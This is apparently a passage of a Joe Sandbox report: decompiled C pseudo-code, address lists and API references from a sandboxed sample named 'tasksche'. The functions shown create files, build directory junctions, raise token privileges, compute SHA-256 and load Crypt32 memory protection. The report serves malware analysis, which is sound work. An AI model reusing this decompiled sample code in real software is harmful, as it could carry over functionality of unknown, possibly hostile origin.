                                                                                              											E00408C7D(_t193, _t227 - 0x3048);
                                                                                              											_t194 = 1;
                                                                                              											L37:
                                                                                              											_push(_t225);
                                                                                              											E0041A506(_t194, _t222, _t225, __eflags);
                                                                                              											_t120 = _t194;
                                                                                              											goto L15;
                                                                                              										}
                                                                                              										CloseHandle(_t191);
                                                                                              										E0040639F(0x14, 0,  *(_t227 + 0xc));
                                                                                              										_t163 = GetLastError();
                                                                                              										__eflags = _t163 - 0x522;
                                                                                              										if(_t163 == 0x522) {
                                                                                              											_t163 = E00401B9B(0x16);
                                                                                              										}
                                                                                              										E00401000(_t163);
                                                                                              										E004062BA(0x4335ac, 9);
                                                                                              										__eflags =  *((char*)(_t222 + 0x10e1));
                                                                                              										_push( *(_t227 + 0xc));
                                                                                              										if( *((char*)(_t222 + 0x10e1)) == 0) {
                                                                                              											DeleteFileW();
                                                                                              										} else {
                                                                                              											RemoveDirectoryW();
                                                                                              										}
                                                                                              										_t194 = 0;
                                                                                              										__eflags = 0;
                                                                                              										goto L37;
                                                                                              									}
                                                                                              									_push(_t225);
                                                                                              									goto L13;
                                                                                              								}
                                                                                              								__eflags = _t122 - 1;
                                                                                              								if(_t122 != 1) {
                                                                                              									L19:
                                                                                              									__eflags =  *(_t227 - 0x20) - _t225;
                                                                                              									goto L11;
                                                                                              								}
                                                                                              								goto L27;
                                                                                              							}
                                                                                              							_t168 =  *(_t227 + 0x10);
                                                                                              							_t225 =  *(_t227 - 0x20);
                                                                                              							_t196 = _t168 + _t168;
                                                                                              							 *(_t225 + 4) =  *((intOrPtr*)(_t227 - 0x10)) + _t168 +  *((intOrPtr*)(_t227 - 0x10)) + _t168 + 0xc;
                                                                                              							 *_t225 = 0xa0000003;
                                                                                              							 *((short*)(_t225 + 6)) = 0;
                                                                                              							 *((short*)(_t225 + 8)) = 0;
                                                                                              							 *((short*)(_t225 + 0xa)) = _t196;
                                                                                              							E0041A7F7(_t225 + 0x10, _t227 - 0x1024);
                                                                                              							 *((short*)(_t225 + 0xe)) =  *((intOrPtr*)(_t227 - 0x10)) +  *((intOrPtr*)(_t227 - 0x10));
                                                                                              							 *((short*)(_t225 + 0xc)) = _t196 + 2;
                                                                                              							E0041A7F7(_t225 + 0x12 +  *(_t227 + 0x10) * 2, _t227 - 0x2024);
                                                                                              							goto L28;
                                                                                              						}
                                                                                              						__eflags =  *((char*)(_t222 + 0x20f4));
                                                                                              						if( *((char*)(_t222 + 0x20f4)) != 0) {
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						_t225 = 0;
                                                                                              						_t178 = CreateFileW( *(_t227 + 0xc), 0x40000000, 0, 0, 1, 0x80, 0);
                                                                                              						__eflags = _t178 - 0xffffffff;
                                                                                              						if(_t178 != 0xffffffff) {
                                                                                              							CloseHandle(_t178);
                                                                                              							goto L23;
                                                                                              						}
                                                                                              						goto L19;
                                                                                              					}
                                                                                              					if(_t191 != 0) {
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					_t21 = _t222 + 0x10f4; // 0x10f4
                                                                                              					_t225 = _t21;
                                                                                              					_t180 = E0040A2F5(_t21);
                                                                                              					_t240 = _t180;
                                                                                              					if(_t180 != 0) {
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					_t22 = _t222 + 0x20; // 0x20
                                                                                              					if(E004065C4(_t191, _t240, _t22, _t225) != 0) {
                                                                                              						goto L16;
                                                                                              					}
                                                                                              					goto L10;
                                                                                              				}
                                                                                              			}



























                                                                                              0x0040690f
                                                                                              0x00406919
                                                                                              0x00406925
                                                                                              0x0040692c
                                                                                              0x00406936
                                                                                              0x0040693b
                                                                                              0x0040693b
                                                                                              0x0040694a
                                                                                              0x0040694d
                                                                                              0x00406952
                                                                                              0x00406955
                                                                                              0x0040695e
                                                                                              0x0040696c
                                                                                              0x0040697d
                                                                                              0x00406988
                                                                                              0x0040698e
                                                                                              0x00406999
                                                                                              0x0040699e
                                                                                              0x004069a5
                                                                                              0x004069a7
                                                                                              0x004069a9
                                                                                              0x004069df
                                                                                              0x004069df
                                                                                              0x00000000
                                                                                              0x004069ab
                                                                                              0x004069ad
                                                                                              0x004069bb
                                                                                              0x004069c0
                                                                                              0x004069c5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004069c9
                                                                                              0x004069ca
                                                                                              0x004069d1
                                                                                              0x004069d7
                                                                                              0x004069e2
                                                                                              0x004069e4
                                                                                              0x004069f5
                                                                                              0x00406a05
                                                                                              0x00406a4b
                                                                                              0x00406a50
                                                                                              0x00406a55
                                                                                              0x00406a5c
                                                                                              0x00406a94
                                                                                              0x00406a9f
                                                                                              0x00406aa1
                                                                                              0x00406a29
                                                                                              0x00406a29
                                                                                              0x00406a2d
                                                                                              0x00406a2d
                                                                                              0x00406a38
                                                                                              0x00406a38
                                                                                              0x00406a3a
                                                                                              0x00406a40
                                                                                              0x00406a48
                                                                                              0x00406a48
                                                                                              0x00406a2f
                                                                                              0x00406a32
                                                                                              0x00406a32
                                                                                              0x00000000
                                                                                              0x00406a37
                                                                                              0x00406aa3
                                                                                              0x00406aa3
                                                                                              0x00406aa5
                                                                                              0x00406aa5
                                                                                              0x00406aab
                                                                                              0x00406aae
                                                                                              0x00406b13
                                                                                              0x00406b16
                                                                                              0x00406b21
                                                                                              0x00406b21
                                                                                              0x00406b24
                                                                                              0x00406b2e
                                                                                              0x00406b3d
                                                                                              0x00406b47
                                                                                              0x00406b4d
                                                                                              0x00406b51
                                                                                              0x00406b55
                                                                                              0x00406b62
                                                                                              0x00406b6b
                                                                                              0x00406b7e
                                                                                              0x00406b88
                                                                                              0x00406b8a
                                                                                              0x00406b8a
                                                                                              0x00406b8d
                                                                                              0x00406b90
                                                                                              0x00406baa
                                                                                              0x00406bac
                                                                                              0x00406baf
                                                                                              0x00406bcf
                                                                                              0x00406bd5
                                                                                              0x00406bd7
                                                                                              0x00406c45
                                                                                              0x00406c50
                                                                                              0x00406c54
                                                                                              0x00406c59
                                                                                              0x00406c5f
                                                                                              0x00406c6a
                                                                                              0x00406c6c
                                                                                              0x00406c7d
                                                                                              0x00406c7f
                                                                                              0x00406c90
                                                                                              0x00406c96
                                                                                              0x00406ca1
                                                                                              0x00406cac
                                                                                              0x00406cb1
                                                                                              0x00406cb8
                                                                                              0x00406cc0
                                                                                              0x00406cc0
                                                                                              0x00406ccb
                                                                                              0x00406ccf
                                                                                              0x00406cd4
                                                                                              0x00406c31
                                                                                              0x00406c31
                                                                                              0x00406c32
                                                                                              0x00406c38
                                                                                              0x00000000
                                                                                              0x00406c38
                                                                                              0x00406bda
                                                                                              0x00406be7
                                                                                              0x00406bec
                                                                                              0x00406bf2
                                                                                              0x00406bf7
                                                                                              0x00406bfb
                                                                                              0x00406bfb
                                                                                              0x00406c07
                                                                                              0x00406c10
                                                                                              0x00406c15
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c29
                                                                                              0x00406c21
                                                                                              0x00406c21
                                                                                              0x00406c21
                                                                                              0x00406c2f
                                                                                              0x00406c2f
                                                                                              0x00000000
                                                                                              0x00406c2f
                                                                                              0x00406bb1
                                                                                              0x00000000
                                                                                              0x00406bb1
                                                                                              0x00406b18
                                                                                              0x00406b1b
                                                                                              0x00406a86
                                                                                              0x00406a86
                                                                                              0x00000000
                                                                                              0x00406a86
                                                                                              0x00000000
                                                                                              0x00406b1b
                                                                                              0x00406ab0
                                                                                              0x00406ab3
                                                                                              0x00406abb
                                                                                              0x00406ac9
                                                                                              0x00406ad3
                                                                                              0x00406ad9
                                                                                              0x00406add
                                                                                              0x00406ae1
                                                                                              0x00406ae5
                                                                                              0x00406aef
                                                                                              0x00406b05
                                                                                              0x00406b09
                                                                                              0x00000000
                                                                                              0x00406b0e
                                                                                              0x00406a5e
                                                                                              0x00406a65
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406a67
                                                                                              0x00406a7b
                                                                                              0x00406a81
                                                                                              0x00406a84
                                                                                              0x00406a8c
                                                                                              0x00000000
                                                                                              0x00406a8c
                                                                                              0x00000000
                                                                                              0x00406a84
                                                                                              0x00406a09
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406a0b
                                                                                              0x00406a0b
                                                                                              0x00406a12
                                                                                              0x00406a17
                                                                                              0x00406a19
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406a1c
                                                                                              0x00406a27
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406a27

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0040690F
                                                                                              • _wcslen.LIBCMT ref: 00406978
                                                                                              • _wcscpy.LIBCMT ref: 004069E4
                                                                                              • _wcslen.LIBCMT ref: 004069F0
                                                                                                • Part of subcall function 00406553: GetCurrentProcess.KERNEL32(00000020,?), ref: 00406562
                                                                                                • Part of subcall function 00406553: OpenProcessToken.ADVAPI32(00000000), ref: 00406569
                                                                                                • Part of subcall function 00406553: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00406589
                                                                                                • Part of subcall function 00406553: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 0040659E
                                                                                                • Part of subcall function 00406553: GetLastError.KERNEL32 ref: 004065A8
                                                                                                • Part of subcall function 00406553: CloseHandle.KERNEL32(?), ref: 004065B7
                                                                                                • Part of subcall function 0040935F: _wcsncpy.LIBCMT ref: 004093C6
                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000001), ref: 00406A7B
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406A8C
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000001), ref: 00406A99
                                                                                              • _wcscpy.LIBCMT ref: 00406AE5
                                                                                              • _wcscpy.LIBCMT ref: 00406B09
                                                                                              • _wcscpy.LIBCMT ref: 00406B55
                                                                                              • _wcscpy.LIBCMT ref: 00406B7E
                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00406BA4
                                                                                              • DeviceIoControl.KERNEL32 ref: 00406BCF
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406BDA
                                                                                              • GetLastError.KERNEL32 ref: 00406BEC
                                                                                              • RemoveDirectoryW.KERNEL32(00000000), ref: 00406C21
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00406C29
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$CloseCreateFileHandle$DirectoryErrorLastProcessToken_wcslen$AdjustControlCurrentDeleteDeviceH_prologLookupOpenPrivilegePrivilegesRemoveValue_wcsncpy
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 295717069-3508440684
                                                                                              • Opcode ID: 54416bbc68546247290bb90bcc992cafd3815891a8ba72df938a6b2bc5e4892e
                                                                                              • Instruction ID: 0b044a0677013c3ee0dedeb9ad72db73be6c8eb7e300feb6a7d55a674be6f19f
                                                                                              • Opcode Fuzzy Hash: 54416bbc68546247290bb90bcc992cafd3815891a8ba72df938a6b2bc5e4892e
                                                                                              • Instruction Fuzzy Hash: 56B1B471A00215AFDF21EF64CC45BDA77B8EF04304F00446AF95AF7281D778AAA4CB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 83%
                                                                                              			E004106F4(signed int* __esi) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v28;
                                                                                              				signed int _v32;
                                                                                              				signed int _v36;
                                                                                              				signed int _v40;
                                                                                              				intOrPtr _v236;
                                                                                              				char _v240;
                                                                                              				intOrPtr _v244;
                                                                                              				intOrPtr _v248;
                                                                                              				intOrPtr _v252;
                                                                                              				intOrPtr _v256;
                                                                                              				intOrPtr _v260;
                                                                                              				intOrPtr _v264;
                                                                                              				intOrPtr _v268;
                                                                                              				intOrPtr _v272;
                                                                                              				intOrPtr _v276;
                                                                                              				intOrPtr _v280;
                                                                                              				intOrPtr _v284;
                                                                                              				intOrPtr _v288;
                                                                                              				intOrPtr _v292;
                                                                                              				char _v296;
                                                                                              				unsigned int* _t154;
                                                                                              				void* _t167;
                                                                                              				signed int _t183;
                                                                                              				signed int _t199;
                                                                                              				signed int _t227;
                                                                                              				signed int _t229;
                                                                                              				void* _t234;
                                                                                              				signed int _t236;
                                                                                              				void* _t243;
                                                                                              
                                                                                              				if(__esi != 0) {
                                                                                              					_v296 = E0041D291( *(__esi[0xa]));
                                                                                              					_v292 = E0041D291( *((intOrPtr*)(__esi[0xa] + 4)));
                                                                                              					_v288 = E0041D291( *((intOrPtr*)(__esi[0xa] + 8)));
                                                                                              					_v284 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0xc)));
                                                                                              					_v280 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x10)));
                                                                                              					_v276 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x14)));
                                                                                              					_v272 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x18)));
                                                                                              					_v268 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x1c)));
                                                                                              					_v264 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x20)));
                                                                                              					_v260 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x24)));
                                                                                              					_v256 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x28)));
                                                                                              					_v252 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x2c)));
                                                                                              					_t229 = 0x30;
                                                                                              					_v248 = E0041D291( *((intOrPtr*)(__esi[0xa] + _t229)));
                                                                                              					_v244 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x34)));
                                                                                              					_v240 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x38)));
                                                                                              					_v236 = E0041D291( *((intOrPtr*)(__esi[0xa] + 0x3c)));
                                                                                              					_t154 =  &_v240;
                                                                                              					_v8 = _t229;
                                                                                              					do {
                                                                                              						asm("rol edi, 0xe");
                                                                                              						asm("ror ebx, 0x7");
                                                                                              						asm("rol ecx, 0xf");
                                                                                              						asm("rol ebx, 0xd");
                                                                                              						_t234 = ( *(_t154 - 0x34) ^  *(_t154 - 0x34) ^  *(_t154 - 0x34) >> 0x00000003) + ( *_t154 ^  *_t154 ^  *_t154 >> 0x0000000a) +  *((intOrPtr*)(_t154 - 0x38));
                                                                                              						_t154 =  &(_t154[1]);
                                                                                              						_t40 =  &_v8;
                                                                                              						 *_t40 = _v8 - 1;
                                                                                              						_t154[1] = _t234 +  *((intOrPtr*)(_t154 - 0x18));
                                                                                              					} while ( *_t40 != 0);
                                                                                              					_t236 =  *__esi;
                                                                                              					_t227 = __esi[4];
                                                                                              					_v8 = _v8 & 0x00000000;
                                                                                              					_v36 = __esi[1];
                                                                                              					_v32 = __esi[2];
                                                                                              					_v28 = __esi[3];
                                                                                              					_v20 = __esi[5];
                                                                                              					_v16 = __esi[6];
                                                                                              					_v40 = _t236;
                                                                                              					_v12 = __esi[7];
                                                                                              					do {
                                                                                              						asm("ror eax, 0xb");
                                                                                              						asm("rol ecx, 0x7");
                                                                                              						asm("ror ecx, 0x6");
                                                                                              						_t62 = _v8 + 0x42ac30; // 0x428a2f98
                                                                                              						_v8 = _v8 + 4;
                                                                                              						_t167 = (_t227 ^ _t227 ^ _t227) + ( !_t227 & _v16 ^ _v20 & _t227) +  *_t62 +  *((intOrPtr*)(_t243 + _v8 - 0x124)) + _v12;
                                                                                              						_v12 = _v16;
                                                                                              						_v16 = _v20;
                                                                                              						_v20 = _t227;
                                                                                              						_t227 = _t167 + _v28;
                                                                                              						asm("ror ecx, 0xd");
                                                                                              						asm("rol ebx, 0xa");
                                                                                              						asm("ror ebx, 0x2");
                                                                                              						_t75 =  &_v36; // 0x405a40
                                                                                              						_t77 =  &_v36; // 0x405a40
                                                                                              						_t81 =  &_v36; // 0x405a40
                                                                                              						_t199 =  *_t81;
                                                                                              						_v28 = _v32;
                                                                                              						_v36 = _v40;
                                                                                              						_t236 = (_t236 ^ _t236 ^ _t236) + (( *_t75 ^ _t236) & _v32 ^  *_t77 & _v40) + _t167;
                                                                                              						_v32 = _t199;
                                                                                              						_v40 = _t236;
                                                                                              					} while (_v8 < 0x100);
                                                                                              					_t88 =  &_v36; // 0x405a40
                                                                                              					 *__esi =  *__esi + _t236;
                                                                                              					__esi[1] = __esi[1] +  *_t88;
                                                                                              					__esi[2] = __esi[2] + _t199;
                                                                                              					__esi[3] = __esi[3] + _v28;
                                                                                              					__esi[4] = __esi[4] + _t227;
                                                                                              					__esi[5] = __esi[5] + _v20;
                                                                                              					__esi[6] = __esi[6] + _v16;
                                                                                              					_t183 = __esi[7] + _v12;
                                                                                              					__esi[7] = _t183;
                                                                                              					return _t183;
                                                                                              				} else {
                                                                                              					E0040CFA3( &_v40, 0x20);
                                                                                              					return E0040CFA3( &_v296, 0x100);
                                                                                              				}
                                                                                              			}




































                                                                                              0x004106ff
                                                                                              0x0041072b
                                                                                              0x0041073e
                                                                                              0x00410751
                                                                                              0x00410764
                                                                                              0x00410777
                                                                                              0x0041078a
                                                                                              0x0041079d
                                                                                              0x004107b0
                                                                                              0x004107c3
                                                                                              0x004107d6
                                                                                              0x004107e9
                                                                                              0x004107fc
                                                                                              0x00410807
                                                                                              0x00410811
                                                                                              0x00410824
                                                                                              0x00410837
                                                                                              0x0041084a
                                                                                              0x00410853
                                                                                              0x00410859
                                                                                              0x0041085c
                                                                                              0x00410863
                                                                                              0x0041086b
                                                                                              0x00410874
                                                                                              0x00410879
                                                                                              0x00410885
                                                                                              0x00410888
                                                                                              0x0041088e
                                                                                              0x0041088e
                                                                                              0x00410891
                                                                                              0x00410891
                                                                                              0x00410899
                                                                                              0x0041089b
                                                                                              0x0041089e
                                                                                              0x004108a2
                                                                                              0x004108a8
                                                                                              0x004108ae
                                                                                              0x004108b4
                                                                                              0x004108ba
                                                                                              0x004108c0
                                                                                              0x004108c3
                                                                                              0x004108c6
                                                                                              0x004108cb
                                                                                              0x004108d0
                                                                                              0x004108d9
                                                                                              0x004108ec
                                                                                              0x004108f2
                                                                                              0x00410900
                                                                                              0x00410903
                                                                                              0x00410909
                                                                                              0x00410911
                                                                                              0x00410914
                                                                                              0x00410919
                                                                                              0x0041091c
                                                                                              0x00410923
                                                                                              0x00410928
                                                                                              0x00410930
                                                                                              0x00410944
                                                                                              0x00410944
                                                                                              0x00410947
                                                                                              0x0041094d
                                                                                              0x00410950
                                                                                              0x00410953
                                                                                              0x00410956
                                                                                              0x00410956
                                                                                              0x00410961
                                                                                              0x00410966
                                                                                              0x00410970
                                                                                              0x00410978
                                                                                              0x00410983
                                                                                              0x0041098b
                                                                                              0x00410996
                                                                                              0x004109a1
                                                                                              0x004109a7
                                                                                              0x004109aa
                                                                                              0x004109af
                                                                                              0x00410701
                                                                                              0x00410707
                                                                                              0x0041071e
                                                                                              0x0041071e

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: __byteswap_ulong
                                                                                              • String ID: @Z@
                                                                                              • API String ID: 2309504477-3109265564
                                                                                              • Opcode ID: 3d995ba0cc5bd3afd1912a8f52df84b91350d78957cf3c3d8552aa4fe151a300
                                                                                              • Instruction ID: 1dc3a99616fea8f09d0a2898b21a56a39af3494018e3c7a499627515aa5f83aa
                                                                                              • Opcode Fuzzy Hash: 3d995ba0cc5bd3afd1912a8f52df84b91350d78957cf3c3d8552aa4fe151a300
                                                                                              • Instruction Fuzzy Hash: 869119B1A006148FCB24DF5AC881A9EB7F1FF48308F1445AEE59AE7721D734E9948F48
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040CEB6(struct HINSTANCE__** __ecx) {
                                                                                              				void* _t5;
                                                                                              				struct HINSTANCE__* _t6;
                                                                                              				struct HINSTANCE__** _t12;
                                                                                              
                                                                                              				_t12 = __ecx;
                                                                                              				if( *((char*)(__ecx + 4)) == 0) {
                                                                                              					_t6 = LoadLibraryW(L"Crypt32.dll");
                                                                                              					 *_t12 = _t6;
                                                                                              					if(_t6 != 0) {
                                                                                              						_t12[2] = GetProcAddress(_t6, "CryptProtectMemory");
                                                                                              						_t6 = GetProcAddress( *_t12, "CryptUnprotectMemory");
                                                                                              						_t12[3] = _t6;
                                                                                              					}
                                                                                              					_t12[1] = 1;
                                                                                              					return _t6;
                                                                                              				}
                                                                                              				return _t5;
                                                                                              			}






                                                                                              0x0040ceb7
                                                                                              0x0040cebd
                                                                                              0x0040cec4
                                                                                              0x0040ceca
                                                                                              0x0040cece
                                                                                              0x0040cee6
                                                                                              0x0040cee9
                                                                                              0x0040ceeb
                                                                                              0x0040ceee
                                                                                              0x0040ceef
                                                                                              0x00000000
                                                                                              0x0040ceef
                                                                                              0x0040cef4

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CF0E,00000020,?,?,00405D3C,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CEC4
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CEDD
                                                                                              • GetProcAddress.KERNEL32(00438800,CryptUnprotectMemory), ref: 0040CEE9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2238633743-1753850145
                                                                                              • Opcode ID: 5fe6950aaff99067424b8bdf76d8a3167c7df5a56d66711809a8faa92a841fba
                                                                                              • Instruction ID: 6e3b8f00ce2f8e0fa430b510b5536735c08c44b91adf59875fbb0715622b898a
                                                                                              • Opcode Fuzzy Hash: 5fe6950aaff99067424b8bdf76d8a3167c7df5a56d66711809a8faa92a841fba
                                                                                              • Instruction Fuzzy Hash: 7EE092306003119FD7319F79EC44B03BBE89F94B10B14846FE984E3250C6B8D4518B5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00406553(WCHAR* _a4) {
                                                                                              				void* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                              				long _t19;
                                                                                              
                                                                                              				_t19 = 0;
                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8) != 0) {
                                                                                              					_v24.PrivilegeCount = 1;
                                                                                              					_v12 = 2;
                                                                                              					if(LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)) != 0 && AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0) != 0 && GetLastError() == 0) {
                                                                                              						_t19 = 1;
                                                                                              					}
                                                                                              					CloseHandle(_v8);
                                                                                              				}
                                                                                              				return _t19;
                                                                                              			}







                                                                                              0x00406560
                                                                                              0x00406571
                                                                                              0x0040657a
                                                                                              0x00406582
                                                                                              0x00406591
                                                                                              0x004065b2
                                                                                              0x004065b2
                                                                                              0x004065b7
                                                                                              0x004065b7
                                                                                              0x004065c1

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000020,?), ref: 00406562
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00406569
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00406589
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 0040659E
                                                                                              • GetLastError.KERNEL32 ref: 004065A8
                                                                                              • CloseHandle.KERNEL32(?), ref: 004065B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                              • String ID:
                                                                                              • API String ID: 3398352648-0
                                                                                              • Opcode ID: c4d8732f7f1e2046f43f8b45a71e1742e44d7c33346580acd03521233585be14
                                                                                              • Instruction ID: 201d4201c496fcfd48e74424a9b99b2c6b7fcfb09556bcb8571a25bcb240e8ee
                                                                                              • Opcode Fuzzy Hash: c4d8732f7f1e2046f43f8b45a71e1742e44d7c33346580acd03521233585be14
                                                                                              • Instruction Fuzzy Hash: A0011DB1600209FFDB209FA4DC89EAF7BBCAB04344F401076B902E1255D775CE259A75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E00401CC1(intOrPtr* __ecx, void* __eflags) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t334;
                                                                                              				unsigned int _t340;
                                                                                              				signed int _t344;
                                                                                              				signed int _t345;
                                                                                              				void* _t347;
                                                                                              				signed int _t349;
                                                                                              				char _t369;
                                                                                              				signed short _t376;
                                                                                              				signed int _t382;
                                                                                              				void* _t388;
                                                                                              				signed int _t389;
                                                                                              				signed int _t392;
                                                                                              				void* _t396;
                                                                                              				signed char _t401;
                                                                                              				char _t406;
                                                                                              				signed int _t414;
                                                                                              				char _t415;
                                                                                              				signed int _t418;
                                                                                              				signed int _t419;
                                                                                              				void* _t420;
                                                                                              				void* _t422;
                                                                                              				signed int _t429;
                                                                                              				signed short _t434;
                                                                                              				signed short _t439;
                                                                                              				signed char _t444;
                                                                                              				signed int _t448;
                                                                                              				signed int _t454;
                                                                                              				signed int _t461;
                                                                                              				signed int _t468;
                                                                                              				void* _t469;
                                                                                              				void* _t471;
                                                                                              				short* _t472;
                                                                                              				void* _t481;
                                                                                              				intOrPtr _t488;
                                                                                              				void* _t492;
                                                                                              				signed char _t495;
                                                                                              				signed int _t497;
                                                                                              				void* _t500;
                                                                                              				void* _t503;
                                                                                              				intOrPtr* _t509;
                                                                                              				signed int _t521;
                                                                                              				signed int _t526;
                                                                                              				signed int* _t530;
